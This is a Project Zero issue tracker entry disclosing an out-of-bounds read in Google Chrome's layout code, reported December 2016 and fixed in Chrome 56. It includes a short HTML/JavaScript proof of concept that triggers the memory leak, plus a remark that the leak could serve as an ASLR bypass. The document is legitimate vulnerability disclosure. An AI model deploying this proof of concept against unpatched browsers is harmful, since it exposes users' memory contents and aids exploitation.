1024 - Google Chrome: out-of-bound read in layout - project-zero

Starred by 1 user

Status:	Fixed
Owner:	ifratric@google.com
Closed:	Feb 2017
Cc:	project-...@google.com
Severity-Medium Product-Chrome Deadline-90 Vendor-Google Finder-ifratric CCProjectZeroMembers Reported-2016-Dec-05

Google Chrome: out-of-bound read in layout

Project Member Reported by ifratric@google.com, Dec 7 2016

Back to list

Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:

<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>

Infoleak is demonstrated in the attached screenshot.

Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

	infoleak.png 14.5 KB View Download

Project Member Comment 1 by ifratric@google.com, Feb 22 2017

Labels: -Restrict-View-Commit
Status: Fixed

Fixed in Chrome 56.

Project Member Comment 2 by ifratric@google.com, Feb 23 2017

The patch in Chrome 56 is https://chromium.googlesource.com/chromium/src/+/74c7fa91b738155df1b8bb871d81f92c28c7941a. That patch adds RELEASE_CHECK for the error condition and turns this into a (non-exploitable) crash.

The patch for the root cause is https://chromium.googlesource.com/chromium/src/+/72473efe964b34ed70910de4cc59c6295cc63019. That one didn't make it into the release.

► Sign in to add a comment